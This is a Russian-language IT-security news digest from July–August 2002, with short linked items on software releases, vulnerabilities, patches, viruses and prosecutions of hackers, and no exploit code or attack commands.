Новая версия Norton Ghost 2003 может работать как с CD-рекордерами, так и с DVD-рекордерами. Кроме того, возможна запись образов дисков на накопителях, подключаемых по интерфейсам USB 1.1, 2.0 и FireWire. Пакет поддерживает работу с файловыми системами Linux EXT3, EXT2, Microsoft FAT и NTFS. Norton Ghost позволяет копировать как весь жесткий диск, так и его отдельные разделы, а также автоматически создавать разделы необходимого объема. Кроме того, в новой версии сохраняется возможность восстанавливать отдельные файлы и папки из образа диска. Источник - http://www.compulenta.ru/2002/8/29/33511/
29/08/2002 Encrypting SNMP 1/v2 with Zebedee.
Статья о том, как настроить безопасное зашифрованное соединение между SNMP агентами и trapd хостами с помощью программы Zebedee(программа, которая служит для создания шифрованных соединений). Прочитать: http://packetstorm.decepticons.org/papers/cryptography/snmprizzo.txt
28/08/2002 Статья: Безопасность в Интернет для начинающих пользователей Linux.
В статье приведен ряд советов для обеспечения безопасности во время веб-серфинга в Интернете для пользователей Linux. Автор статьи подчеркивает, что эта статья в первую очередь предназначена для начинающих пользователей Linux, но эта статья будет полезна и "бывалым" пользователям. Читать - http://online.securityfocus.com/news/597
28/08/2002 Министерство обороны США отключит свои сети от Интернета.
После многочисленных попыток защитить свои компьютеры в Интернете от хакеров министерство обороны США (DoD) пришлo к выводу, что наиболее надежным решением станет их отключение от всемирной паутины. Источник - http://www.cnews.ru/news/ebusiness/2002/08/28/20020828135314.shtml
28/08/2002 Релиз Sendmail v.8.12.6.
Вышла новая версия Sendmail v.8.12.6, в новой версии по сравнению с Sendmail v.8.12.6 Beta1 сделано не очень много изменений, но одним из существенных является устранение проблемы с обработкой очереди. Подробнее - http://www.sendmail.org/8.12.6.html Скачать - ftp://ftp.sendmail.org/pub/sendmail/
26/08/2002 В Томске состоялся суд над двумя хакерами.
По сообщению "Интерфакс", хакеры распространяли "троянов", узнавая таким образом имена и пароли для доступа в Интернет через местного провайдера - компанию "Томсктелеком". Впоследствии "хакеры" использовали полученный доступ в личных целях, причем, по некоторым данным, со своих домашних телефонов. По решению суда они были признаны виновными в несанкционированном доступе к информации и использовании ее для получения выгоды и приговорены к 2,5 и 3,5 годам лишения свободы с испытательным сроком, кроме того суд обязал их возместить "Томсктелекому" ущерб в размере 4200 рублей. Источник - http://www.lenta.ru/internet/2002/08/26/tomsk/
26/08/2002 Баг в Kerio Personal Firewall.
Обнаружен ряд багов, позволяющих злоумышленнику провести Synflood атаку на компьютер жертвы с установленным на нем Kerio Personal Firewall v.2.x, даже если в установках firewall установлена блокировка всех портов и протоколов. Подробнее - http://online.securityfocus.com/archive/1/289119
26/08/2002 Уязвимость в Microsoft Internet Explorer.
Обнаружена уязвимость в Microsoft ActiveX controls во всех версиях Microsoft Internet Explorer, используя эту уязвимость, злоумышленник сможет выполнить на компьютере жертвы произвольный код и получить возможность удаленного администрирования. Подробнее - http://online.securityfocus.com/archive/1/289106
24/08/2002 Статья: Защита FreeBSD.
В статье приведен ряд советов по увеличению безопасности FreeBSD. Источник - http://www.opennet.ru/opennews/art.shtml?num=1440 Читать - http://www.onlamp.com/pub/a/bsd/2002/08/08/FreeBSD_Basics.html
23/08/2002 Кумулятивный патч для Internet Explorer.
Microsoft выпустила "Пакет исправлений для обозревателя Internet Explorer(5.01/5.5/6.0), август 2002 года", данный пакет исправляет 6 новых уязвимостей, самые серьезные из них позволяют злоумышленнику выполнять произвольный программный код на компьютере жертвы. Подробнее - http://www.microsoft.com/technet/security/bulletin/MS02-047.asp
23/08/2002 Баг в Windows Media Player.
Найденный баг позволяет злоумышленнику загрузить на компьютер жертвы программу и выполнить ее запуск, данный баг присутствует, только если настройки Internet Explorer и Windows Media Player установлены по-умолчанию. Подробнее - http://online.securityfocus.com/archive/1/288561
23/08/2002 Новая статья на сайте: Процессы в Unix..
В этой статье даются начальные знания о процессах в Unix: что они из себя представляют, как организована память, создание/завершение процесса, взаимодействие процессов. Прочитать: http://www.uinc.ru/articles/34/index.shtml
22/08/2002 Новый вирус - TrojanDownloader.Win32.Apher.
Этот вирус маскируется под сообщение от "Лаборатории Касперского", при запуске вирус загружает Backdoor.Death.25, а эта программа позволяет злоумышленникам незаметно управлять зараженным компьютером: просматривать и пересылать секретную информацию, создавать, копировать и удалять файлы и многое другое. Подробнее - http://www.viruslist.com/index.html?tnews=1001&id=1011871
22/08/2002 Уязвимость в SQL Server 2000.
Обнаружена уязвимость в SQL Server 2000, на этот раз уязвимым оказалась процедура xp_cmdshell, используя данную уязвимость злоумышленник сможет выполнить произвольную команду на сервере, но с низкими привилегиями. Подробнее - http://online.securityfocus.com/archive/1/288670
22/08/2002 Обновление статьи: Защити себя от вторжения или что не надо делать..
В статье были обновленны ссылки на рассматриваемые ресурсы, появились новые советы для пользователей Windows, добавлены советы по борьбе с популярным на сегодя вирусом Klez, а также рассмотрены способы защиты от сниффинга для пользователей Windows. Ознакомиться: http://www.uinc.ru/articles/10/index.shtml
22/08/2002 Статья: Настройка IPsec/IKE на Solaris.
В статье рассказано о создании безопасного шифрованного соединения между двумя хостами в Интернет (под ОС Solaris 8), организовав VPN (virtual private network) сеть при помощи протокола IPsec (IP Security Protocol) и организация обмена секретными ключами через IKE (Internet Key Exchange). В первой части статьи довольно основательно описывается IPsec и IKE, их история и методология функционирования. Вторая часть будет посвящена настройке VPN туннеля на Solaris. Источник - http://www.opennet.ru/opennews/art.shtml?num=1435 Читать - http://online.securityfocus.com/infocus/1616
21/08/2002 Новая статья на compulenta.ru.
Обзор прошедшей выставки Linuxworld 2002. Прочитать - http://www.compulenta.ru/2002/8/16/33218/
20/08/2002 Уязвимость в Tiny Personal Firewall.
Обнаружена уязвимость в Tiny Personal Firewall v.3.0, данная уязвимость может привести к переполнению буфера и зависанию системы. Подробнее - http://online.securityfocus.com/archive/1/288274
20/08/2002 Заметка: Обход блокировки портов.
Небольшая заметка на тему обхода блокировки различных портов firewall, в данной заметке приведен подробный пример. Подробнее - http://antiproxy.com/anticensoring.php?op=P0rt-Blocks/index.htm
20/08/2002 Хакеры на самолетах взламывают австралийские беспроводные сети.
Австралийские хакеры решили отыскивать беспроводные сети не традиционными методами, такими как поездки по улицам на автомобилях и велосипедах, а более изощренными - с высоты 460 метров над городом при помощи лёгкого самолёта, используя для обнаружения несколько карманных компьютеров и ноутбук, объединённых в небольшую беспроводную сеть. Подробнее - http://www.lenta.ru/internet/2002/08/20/wireless/
19/08/2002 Новая версия MIME Defanger.
MIME Defanger - сканер электронной почты MIME, созданный для защиты клиентов Windows от вирусов и различного спама. Данная программа может изменять или удалять различные части сообщения MIME, в зависимости от конфигурации программы. Эта программа может быть подключена к Sendmail v.8.11/8.12. В новой версии был улучшен фильтр спама и устранен ряд проблем в perl-модулях. Скачать - http://packetstorm.decepticons.org/UNIX/mail/mimedefang-2.17.tar.gz
19/08/2002 Релиз LogAgent v.2.1.
LogAgent 2.1 - программа, написанная на Perl для сбора log-файлов разных приложений с разных компьютеров сети в одном месте, все это происходит в реальном времени, эта программа может понадобиться, когда необходимо создать общий отчет по работе в сети. Подробнее - http://packetstorm.decepticons.org/Win2k/logagent.txt
17/08/2002 Уязвимость в Internet Explorer.
Обнаруженная уязвимость позволяет при помощи специального апплета XML Datasource производить чтение и пересылку файлов. Подверженным данной уязвимости оказался Internet Explorer 4.0(и выше). Подробнее - http://online.securityfocus.com/archive/1/287895
17/08/2002 Уязвимость в Microsoft DirectX Files Viewer.
Обнаружена уязвимость в Microsoft DirectX Files Viewer(xweb.ocx), данная уязвимость позволяет злоумышленнику удаленно выполнять произвольный программный код с правами текущего пользователя. Подробнее - http://online.securityfocus.com/archive/1/287848
17/08/2002 Статья: В бой идут одни «старики»...
В статье рассказывется о создании сети из маломощных компьютеров для работы с современными приложениями, используя проект LTSP(Linux Terminal Server Project). Читать - http://softerra.ru/freeos/19534/page1.html
16/08/2002 Баг в Apache v.2.0.39.
Обнаруженный баг позволяет злоумышленнику просматривать любой файл на сервере и выполнять произвольный программный код. Подвержены этому багу оказались Apache 2.0.39(и предыдущие версии) на ОС, которые поддерживают обратный слэш в пути, это Windows, Netware, OS2 и др. Подробнее - http://online.securityfocus.com/archive/1/287722
16/08/2002 ФСБ против ФБР.
Представители российских спецслужб заявили вчера, что следственное управление УФСБ по Челябинской области возбудило уголовное дело по статье 272 УК России (несанкционированный доступ к компьютерной информации) против агента ФБР Майкла Шулера. Поводом для возбуждения дела стали методы, с помощью которых американские спецслужбы добыли доказательства виновности российских программистов из Челябинска Василия Горшкова и Алексея Иванова. Источник - http://www.rol.ru/news/it/internet/02/08/16_003.htm
16/08/2002 Статья: Sendmail vs spam.
В статье рассмотрен ряд примеров настройки Sendmail для борьбы с различного рода спама. Читать - http://www.softerra.ru/freeos/19480/page1.html
15/08/2002 Патч для Windows 2000.
Выпущен патч, решающий проблему с "Flaw in Network Connection Manager" в Windows 2000. Данный патч предотвращает возможность злоумышленнику повысить свои привилегии через "Менеджер сетевых поключений" и выполнить произвольный программный код. Подробнее - http://www.microsoft.com/windows2000/downloads/critical/q326886/default.asp
15/08/2002 Релиз GCC 3.2.
Вышла новая версия компилятора C++ для Unix. В новой версии сохранились все возможности из GCC 3.1, без добаления новых, выходу же новой версии послужил ряд серьезных багфиксов. Подробнее - http://gcc.gnu.org/ml/gcc/2002-08/msg00405.html Скачать - ftp://ftp.gnu.org/gnu/gcc
15/08/2002 Шифрование данных в ноутбуках.
Американский изобретатель разработал очень необычную систему защиты информации в портативных компьютерах: самое интересное, что эту систему даже не нужно активировать – это происходит автоматически, как только пользователь отходит от ноутбука. Источник - http://slashzone.ru/article.pl?sid=02/08/15/075243
14/08/2002 Доступна для скачивания Kylix 3.
На официальном сайте Borland была выложена для скачивания демо-версия среды быстрой разработки Linux приложений - Kylix 3. В новой версии было сделано включение IDE и компилятора C++ в дополнение к среде и компилятору Delphi. Источник - http://www.linux.org.ru/view-message.jsp?msgid=217806 Загрузить - http://www.borland.com/products/downloads/download_kylix.html
14/08/2002 Уязвимость в OpenPGP и GnuPG.
Обнаружена уязвимость, позволяющая злоумышленнику прочитать зашифрованное письмо, для того чтобы это стало возможным он должен перехватить письмо и модифицировать его специальным методом, не расшифровывая само письмо, затем получатель этого письма не сможет расшифровать присланные ему зашифрованные данные, и если он попытается ответить на это письмо, включив шифр в ответ, то злоумышленник перехватив ответ сможет прочесть зашифрованный текст первоначального письма. Но замеченная ошибка в PGP не слишком опасна, поскольку применить ее на практике очень непросто. Подробнее - http://www.theregister.co.uk/content/4/26643.html
13/08/2002 Релиз Centurion 2.0a.
Данная программа предназначена для выявления возможных уязвимостей в CGI скриптах на удаленном сервере. Изменения в новой версии: + добавлена возможность сканирования нескольких адресов одновременно; + стало возможно подменять User Agent; + появилась возможность изменения портов для каждого сервера отдельно; + встроен IIS фильтр; , а также исправление багов и др. усовершенствования. Скачать - http://lbyte.void.ru/rel/files/centurion2.0a.tar.gz (5Кб)
13/08/2002 Новая версия ASPLinux 7.3 "Восток".
Вышла новая версия дистрибутива ASPLinux 7.3, в новой версии добавлена поддержка кодировок koi8-r, cp1251 и iso8859-5 для русского и украинского языка, возможность настройки XWindow в режиме framebuffer, реализована установка по сети посредством telnet и ряд других дополнений. В основном состав Загрузить - ftp://ftp.asplinux.ru/pub/i386/7.3/ Описание дистрибутива - http://www.asplinux.ru/ru/product73
11/08/2002 Новая версия Nessus v.1.2.4.
Вышла новая версия популярного сканера уязвимости - Nessus под Unix. В новой версии исправлено несколько ошибок в плагинах и в самой программе, кроме этого было решено вернуться к autoconf 2.13. Скачать - http://www.nessus.org/posix.html
11/08/2002 Уязвимость в Apache v.2.0.
Обнаружена уязвимость в веб-сервере Apache v.2.0 для Windows, OS2, Netware. Найденная уязвимость может привести к сбою работы веб-сервера или позволить злоумышленнику получить доступ к конфиденциальной информации. Подробнее - http://online.securityfocus.com/archive/1/286786
11/08/2002 Статья: Из чего только сделаны Linux'ы.
Данная статья будет полезна тем людям, которые плохо разбираются в составляющих Linux. Читать - http://www.softerra.ru/freeos/19466/page1.html
10/08/2002 Вышел Apache 2.0.40.
Вышла новая версия популярнейшего web-сервера. Подробности - http://httpd.apache.org/ ChangeLog - http://www.apache.org/dist/httpd/CHANGES_2.0
10/08/2002 Microsoft обвинили во лжи и назначили 20-летний испытательный срок.
В четверг 8 августа Федеральная комиссия по торговле США и корпорация Microsoft договорились о мерах по урегулированию скандала, возникшего вокруг службы онлайновой идентификации Microsoft Passport. Речь шла о недостаточном обеспечении секретности пользовательских данных. Корпорация согласилась модернизировать защиту, надежность которой будет в течение 20 лет будет предметом государственного контроля. По данным http://www.lenta.ru/
9/08/2002 Умер Эдсгер Вайб Дейкстра.
6 августа в своем доме в Нидерландах умер от рака профессор Эдсгер Вайб Дейкстра. Дейкстра был выдающимся учёным, идеи которого оказали огромное влияние на развитие компьютерной индустрии. Ему было 72 года. Известность Дейкстре принесли его работы в области применения математической логики при разработке компьютерных программ. Дейкстра активно участвовал в разработке языка программирования Algol и написал первый компилятор Algol 60. Будучи одним из авторов концепции структурированного программированния, он проповедовал отказ от использования инструкции GOTO. Идея применения "семафоров" для синхронизации процессов в многозадачных системах также принадлежит Дейкстре. Список его заслуг этим далеко не исчерпывается. В 1972 году Дейкстра стал лауреатом премии Тьюринга. По данным http://www.compulenta.ru/
9/08/2002 Суд над создателем DeCSS состоится в декабре.
Норвежский суд назначил следующее заседание по делу хакера Йона Йохансена на 9 декабря текущего года. Напомним, что Йохансен является создателем программы DeCSS, в которой реализован алгоритм обхода защиты DVD-дисков от копирования. Йохансен утверждает, что создал эту программу, для того чтобы смотреть фильмы на DVD на компьютере под управлением Linux. Для этой операционной системы не было официального DVD-плеера. Источник - http://www.compulenta.ru/2002/8/9/33102/?rt
9/08/2002 Ивановские хакеры обманули "НТВ-плюс".
Хакеры из Ивановской области наладили подпольный выпуск смарт-карт для спутникового телевидения "НТВ-плюс", в результате чего компании был нанесен ущерб на сумму 300 тысяч долларов, сообщается на сайте NTVRU.com. Как сообщил начальник отдела УВД Ивановской области Валерий Измайлов, для защиты смарт-карт, которые выпускаются во Франции, применялась считавшаяся очень надежной электронная система, которую планировалось применять даже в банковском деле. По данным www.lenta.ru
8/08/2002 Баг в плагине Macromedia Flash для Internet Explorer 6.
Найден баг, который позволяет читать и отправлять файлы, обнаружено 3 способа: + создать http редирект на локальный файл; + использовать <base href="file:///C:/"> в документе, а затем передать файл по относительной ссылке; + добавить флэш-объект в веб-архив (mht-файл), а затем, когда пользователь сохранит его на жестком диске, использовать относительную ссылку; Подробнее - http://online.securityfocus.com/archive/1/286625
8/08/2002 Уязвимость в WS_FTP Server v.3.1.1.
Найденная уязвимость позволяет произвести переполнение буфера через команду смены пароля пользователя - "site cpwd", а затем удаленно выполнить произвольный программный код. Подробнее - http://online.securityfocus.com/archive/1/286543
8/08/2002 Уязвимость в Google toolbar v.1.1.58.
Уязвимость позволяет злоумышленнику выполнять различные действия связанные с настройками Google toolbar, кроме этого возможно произвести запуск произвольного программного кода или скрипта. Версии 1.1.59/1.1.60 уже не подвержены данной уязвимости. Подробнее - http://online.securityfocus.com/archive/1/286527
7/08/2002 Создатели вируса Goner ответят перед законом.
Пятеро молодых жителей Израиля предстали перед судом в качестве ответчиков по делу о распространении вируса I-Worm.Goner, один из подсудимых является автором данного интернет-червя, имя которого не называется, но известен его ник - Pentagone. За совершенные правонарушения им грозит тюремное заключение на срок от 3 до 5 лет. Источник - http://www.cnews.ru/news/ebusiness/2002/08/07/20020807182000.shtml Описание I-Worm.Goner - http://www.viruslist.com/viruslist.html?id=4447
7/08/2002 Статья: Повышение привилегий в Windows.
В статье рассмотрен пример повышения привилегий пользователя, используя средства Windows API. Метод описанный в данной статье, по утверждению автора, может быть использован для нарушения правильной работы любого Windows-приложения, в примере это - Network Associates VirusScan v4.5.1. Читать - http://security.tombom.co.uk/shatter.html
7/08/2002 Automatic Update - шпион от Microsoft на вашем компьютере.
Как говорилось ранее Microsoft своей новой лицензионной политикой получила право производить автоматическую установку программного обеспечения на компьютер без ведома пользователя. И вот сейчас была найдена в MS Windows 2000 Service Pack 3 программа-шпион, которая сообщает Microsoft следующие данные: номер версии операционной системы и идентификационный код продукта, номер версии Internet Explorer, номера версий другого программного обеспечения, идентификационные номера Plug and Play аппаратных устройств и т.п. Подробнее - http://www.bezpeka.com/news/2002/08/0501.html
7/08/2002 LinuxGazette #81.
Вышел августовский номер LinuxGazette. На этот раз - статьи об использовании SysRq, программирование графики с libgd, DVD в Linux и многое другое. Прочитать - http://www.linuxgazette.com/issue81/index.html
7/08/2002 MFC или Qt.
Полезная статья, автор которой проводит сравнение 2-х интерфейсов - qt & mfc. Ознакомиться - http://phil.freehackers.org/kde/qt-vs-mfc.html
6/08/2002 Новая статья на сайте: Проблемы безопасности Веб-интерфейсов почтовых сервисов на примере rambler.ru..
В статье рассматриваются слабые стороны Веб-интерфейсов бесплатных почтовых сервисов на примере такого сервиса на rambler.ru. Показаны различные варианты защиты Веб-интерфейсов и пути их обхода для получения доступа к информации пересылаемой электронной почтой. Ознакомиться: http://www.uinc.ru/articles/33/index.shtml
6/08/2002 Невидимый троян - Setiri.
На конференции по компьютерной безопасности Defcon был представлен троян, который использует имеющуюся в браузере Internet Explorer стандартную функцию, позволяющую открывать в нем невидимое окно и подключаться к Internet. Это окно открывается в фоновом режиме, оно не появляется на рабочем столе, поэтому пользователь не может видеть, что в нем происходит. В менеджере задач (Windows Task Manager), это невидимое окно будет указано как IEXPLORE.EXE, т. е. как обычное окно Internet Explorer. Представитель Microsoft в свою очередь заявил, что его компания собирается тщательно изучить эту проблему и, возможно, ограничить функции невидимых окон, хотя это будет нелегко. Троян Setiri был создан только для демонстрационных целей. Но один из его создателей сообщил, что после доклада на конференции к нему подошел какой-то человек и сказал, что он и его приятели уже создали трояна, которые может делать то же самое, что и Setiri. А они никаких обязательств по нераспространению на себя не брали. Источник - http://www.rol.ru/news/it/internet/02/08/06_007.htm Подробнее - http://www.pcworld.com/news/article/0,aid,103620,00.asp
6/08/2002 Воскрешение игровой приставки Dreamcast.
На конференции по компьютерной безопасности Defcon была представлена игровая приставка Dreamcast со специально разработанным программным обеспечением записанным на CD-R, программное обеспечение представляло из себя Unix подобную систему. С помощью данной разработки, по словам разработчиков, возможно производить мониторинг, защиту и даже шифровку внутренней сети. Подробнее - http://www.zdnet.com.au/newstech/security/story/0,2000024985,20267176,00.htm
6/08/2002 Статья: Бэкап с FreeBSD сервера на Windows машину через SMBFS.
В статье рассказывается по шагам о включении поддержки SMBFS в FreeBSB, монтированнии удаленных ресурсов с windows машин и организации бэкапа данных на удаленную Windows машину. Источник - http://www.opennet.ru/opennews/art.shtml?num=1390 Читать - http://ezine.daemonnews.org/200208/smbfs.html
6/08/2002 Уязвимость в Eudora v.5.x.
Обнаружена уязвимость в почтовом клиенте Eudora v.5.x, позволяющая злоумышленнику через переполнение буфера выполнить произвольный программный код. Подробнее - http://online.securityfocus.com/archive/1/286073
5/08/2002 Новая лицензионная политика от Microsoft.
Microsoft внесла изменения в EULA(лицензия для конечного пользователя), суть изменения заключается в том, что используя продукты Microsoft вы соглашаетесь с тем, что Microsoft получает право автоматической установки программного обеспечения на компьютер без ведома пользователя. Под такой лицензией Microsoft уже выпустила пакеты обновления: Windows XP Service Pack 1 и Windows 2000 Service Pack 3. Для чего Microsoft понадобилось вводить такое правило в лицензии остается только гадать. Подробнее - http://www.theregister.co.uk/content/4/26517.html
5/08/2002 Технология "адекватного ответа" на хакерские атаки.
На конференции по компьютерной безопасности DefCon компания AnchorIS представила свою технологию, позволяющую проводить ответные атаки на ПК злоумышленников. В результате такой атаки компьютер, с которого было произведено нападение, "зависает". Многие участники конференции не поддержали данную технологию, аргументируя это тем, что возможно ошибочное поражение компьютеров, не имеющего никакого отношения к злоумышленникам. Источник - http://itware.com.ua/news/2002/08/05/hacker.html
5/08/2002 Вышел драйвер NTFS 2.0.23a для Linux 2.4.
Вышел NTFS 2.0.23a драйвер для Linux 2.4 (2.4.19 в частности). Помимо самого модуля для ядра, в этом пакете имеется так-же несколько пользовательских програм (т.е. ntfs check и т.д.). Исправлен ряд ошибок: races, deadlocks, non-i386 архитектуры. Подробнее - https://sourceforge.net/project/shownotes.php?release_id=103407
5/08/2002 Релиз NTFS Reader for DOS v.1.0.
Как видно из названия, программа служит для чтения разделов NTFS и дальнейшего копирования из разделов NTFS в разделы FAT. Данная программа поддерживает следующие файловые системы: NTFS, NTFS5, FAT12, FAT16, FAT32, кроме этого программа понимает названия файлов на не английском языке и длинные имена. Работает программа под следующими ОС: DOS, Windows 3.x/95/98/Me/NT/2000/XP. Скачать - http://www.ntfs.com/downloads/readntfs.exe (147Кб)
3/08/2002 LINUX 2.4.19.
Свершилось! После 5-ти месяцев ожидания пользователи ОС Линукс получили в свое распоряжение ядро 2.4.19. Как и следовало ожидать - это всего лишь другое название 2.4.19-rc5. Скачать - http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.19.tar.bz2 ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.19
3/08/2002 В Италии арестовано 14 хакеров.
Арестованные хакеры состояли в группах "Mentor" и "Reservoir Dogs", хакеров обвиняют в неоднакратных взломах крупных правительственных и государственных структур. По словам арестованных, их не интересовала политика, они взламывали только для своего интереса. Возраст арестованных хакеров от 16 до 26 лет. За совершенные преступления им грозит тюремное заключение на срок до 8 лет. Подробнее - http://zdnet.com.com/2100-1105-948179.html
2/08/2002 Обнаружен баг в Raptor Firewall 6.5.
Обнаруженный баг заключается в неправильной генерации Initial Sequence Numbers ("ISNs"), это может привести к тому, что злоумышленник сможет обойти firewall или проследить любое соединение. Подробнее - http://online.securityfocus.com/archive/1/285729
2/08/2002 Проблемы с MS Windows 2000 SP3.
Как сообщалось ранее Microsoft выпустил очередной Service Pack для Windows 2000, но по сообщениям The Inquirer после установки данного Service Pack при загрузке появляется "синий экран смерти". Для проверки данный Service Pack был установлен на несколько разных по конфигурации компьютера, но результат установки был одинаковый. По сообщению из других источников, причиной данного сбоя послужил контроллер Promise ATA-133. Подробнее - http://www.theinquirer.net/?article=4729 Компания Promise - http://www.promise.com/
2/08/2002 Релиз KNOPPIX v.3.1.
Вышла новая версия KNOPPIX - это инсталляция Debian GNU/Linux, которая грузится с CD и не требует HDD. CD версия включает в себя: + Debian testing+unstable GNU/Linux, + Kernel 2.4.19-rc3-xfs, + XFree86 V4.2 + KDE 3.0.2 with KOffice, + OpenOffice 1.0.1 (deutsch+english), + Security-Tools: Nessus, ettercap etc. + Demos: OpenMusic-Soundtracks Подробнее - http://www.knopper.net/knoppix/index-en.html
2/08/2002 Kernel 2.4.19-rc5.
Не успел выйти в свет 4-й релиз кандидат 19ого ядра, как уже сейчас мы лицезреем changelog 5-ого RC (а кто-то говорил что rc4 - это уже 2.4.19). ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.4/testing/patch-2.4.19.log Скачать - http://www.kernel.org/pub/linux/kernel/v2.4/testing/patch-2.4.19-rc5.bz2
2/08/2002 Unix.com останется у пользователей Unix.
На этой неделе арбитражная комиссия по разрешению спорных вопросов о доменных именах приняла решение по домену Unix.com. Домен останется во владении нынешнего владельца домена - Тима Басса, президента компании Silk Road. Конфликт вокруг доменного имени был начат компанией Open Group, которая владеет правами на торговую марку "Unix". В ходе разбирательства Тим Басс не раз утверждал, что за время существования Unix-совместимых ОС, значение этого слова столько раз менялось и использовалось для обозначения различных программных продуктов, что теперь его можно считать общеприменимым. Источник - http://www.compulenta.ru/2002/8/1/32889/
2/08/2002 Обновлен libpng2/libpng3 в Дебиан.
Разработчики популярной библиотеки libpng обнаружили уязвимость типа "переполнение буфера" в своем ПО. Первым отреагировал Debian. Источник - http://www.lwn.net/Articles/6612/
2/08/2002 Вышло Linux 2.5.30.
Новый релиз в нестабильной ветви. На этот раз: (*) устранены недостатки в реализации NFS (*) новые функции для работы с LSM (*) новое поле в fops - sendfile (*) обновление JFFS2 и многое другое Подробности - http://www.lwn.net/Articles/6616/ Скачать - linux-2.5.30.tar.bz2
2/08/2002 Уязвимость в AnswerBook2.
Обнаружена уязвимость в AnswerBook2 на Solaris 2.6, 2.7, 2.8. Использование этой уязвимости позволяет злоумышленнику выполнить произвольный программный код или команду от лица администратора, вплоть до создания нового пользователя с правами администратора. Подробнее - http://online.securityfocus.com/archive/1/285689
2/08/2002 Уязвимость в Trillian v.0.73, 0.72.
Найдена уязвимость в IRC модуле интернет-пейджера Trillian v.0.73, 0.72. Данная уязвимость позволяет выполнить произвольный программный код на машине жертвы. Подробнее - http://online.securityfocus.com/archive/1/285639
2/08/2002 Релиз Snort Alert Monitor.
Монитор реального времени, предупреждающий об атаке на вашу сеть или узел. Предупреждение может быть аудио-визуальным, текстовым сообщением и др. Эта программа работает на следующих ОС: Windows 95/98/NT/2000, MacOS X, Linux, BSD, Solaris. Подробнее - http://freesoftware.lookandfeel.com/sam/
2/08/2002 Советник Буша высказал свое отношение к хакерам.
По сообщению CNN советник Буша по компьютерной безопасности Ричард Кларк на конференции Black Hat высказал свое признание хакерам, которые находят уязвимости в различном ПО и сообщают о них производителям этого ПО. Подробнее - http://www.cnn.com/2002/TECH/internet/08/01/computer.security.ap/index.html
1/08/2002 Уязвимость в WinHelp32.
Уязвимость заключается в том, что злоумышленник может удаленно выполнить произвольный программный код на компьютере жертвы. Уязвимость тестировалась на MS Windows 2000 с установленным SP2. Подробнее - http://online.securityfocus.com/archive/1/285592
1/08/2002 Троян в OpenSSH v.3.2.2p1, 3.4p1 и 3.4.
В дистрибутиве OpenSSH v.3.2.2p1/3.4p1/3.4 был обнаружен скрытый троян, который активировался во время компиляции ядра. Подробнее - http://online.securityfocus.com/archive/1/285554 Подробнее - http://online.securityfocus.com/archive/1/285492
1/08/2002 Релиз NMAP v.3.0.
Вышла новая версия популярной программы для исследования сетей - NMAP. Теперь NMAP может распознавать более 700 операционных систем и сетевых устройств, проводить сканирование различных протоколов (TCP, IGMP, GRE, UDP, ICMP и др.), добавлена возможность проводить исследование сети от вымышленного IP-адреса не демонстрируя истинный, а также ряд других изменений и багфиксов. Теперь NMAP может работать на большинстве известных ОС. Загрузить - http://www.nmap.org/nmap/nmap_download.html
1/08/2002 Вирусная двадцатка за Июль.
Лаборатория Касперского представила вирусную двадцатку за Июль, лидером этой двадцатки по прежнему остался I-Worm.Klez, вторую же позицию занял I-Worm.Lentin сместив на третие место - Win95.CIH. Подробнее - http://www.viruslist.com/index.html?tnews=1003&id=527412 Описание I-Worm.Klez - http://www.viruslist.com/viruslist.html?id=4415 Описание I-Worm.Lentin - http://www.viruslist.com/viruslist.html?id=129431 Описание Win95.CIH - http://www.viruslist.com/viruslist.html?id=3342
1/08/2002 Вышел патч для Microsoft Data Access Components.
Уязвимость, которую закрывает этот патч заключается в том, что функции MDAC, лежащие в основе OpenRowSet содержали буфер без контроля типов. Использование этой уязвимости могло привести к выполнению произвольного кода или сбою системы. Подвержены данной уязвимости были MDAC 2.5/2.6/2.7. Патч для MDAC 2.5 - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=41076 Патч для MDAC 2.6 - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=41077 Патч для MDAC 2.7 - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=41072
1/08/2002 Linux 2.4.19-rc4.
Вчера вышел очередной (уже четвертый) препатч ядра 2.4.19. По данным LWN.Net, уже можно смело ставить знак ревенства между ним и самим ядром 2.4.19. Источник - http://www.lwn.net ChangeLog - http://www.lwn.net/Articles/6459/
1/08/2002 Первый обфускатор .NET CLR кода.
"..При наличии бесконечных временных, денежных ресурсов и физического доступа к коду может быть восстановлен исходный текст любой программы. Это верно как для обычных x86 бинариков, так и для .NET приложений. Основная задача обфускатора - поднять стоимость реинжениринга. Будем надеяться, поднять достаточно для того, чтобы реверсинг стал невыгодным.." http://www.wiseowl.com/products/Products.aspx
1/08/2002 ВНИМАНИЕ: На сайте установлена новая поисковая система..
Улучшения в поиске: + Теперь производится правильный поиск среди русских слов + Можно искать, как по всему сайту, так и по разделам (статьи, новости, форум) Попробывать новый поиск
31/07/2002 Новая версия ZoneAlarm v. 3.1.291.
Вышла новая версия популярного firewall под MS Windows. В новой версии были сделаны следующие изменения: встроена новая защита от VBS вирусов, улучшена фильтрация запросов, а также появился индикатор сообщающий, какие компьютеры из доверенной зоны находятся в сети и ряд других обновлений. Подробнее - http://www.zonelabs.com/store/content/company/products/znalm/releaseHistory.jsp
31/07/2002 Релиз Windows CE .Net v.4.1.
В новой версии добавленна поддержка IPv6 и речевого интерфейса Speech API 5.0, стала доступна возможность просмотра документов в форматах Microsoft Word, Excel, PowerPoint и Adobe Acrobat, а также улучшенна производительность при работе с Web-броузером и протоколом RDP (Remote Display Protocol) и при воспроизведении мультимедийной информации в формате Windows Media. Подробнее - http://www.microsoft.com/windows/embedded/ce.net/default.asp
31/07/2002 Статья: Программы-оболочки Linux.
В статье представлены основные термины и определения связанные с программами-оболочками Linux, а также представлен обзор интерпретатора и командного языка bash. Читать - http://www.softerra.ru/freeos/19209/page1.html
31/07/2002 Переполнение буфера в Sun RPC.
Найдена уязвимость, позволяющая удаленно произвести переполнение буфера в Sun Microsystems Solaris v. 2.5.1/2.6/7/8/9, это может помочь злоумышленнику получить права суперпользователя, что представляет серьезный риск для незащищенной сети. Подробнее - http://online.securityfocus.com/archive/1/285308
31/07/2002 Статья: Построение невидимого firewall на OpenBSD.
В статье подробно описывается как можно создать "невидимый" firewall, путем использования возможности пакетного фильтра фильтровать пакеты проходящие через ethernet бридж. Читать - http://ezine.daemonnews.org/200207/transpfobsd.html
31/07/2002 Релиз Service Pack 3 для Windows 2000.
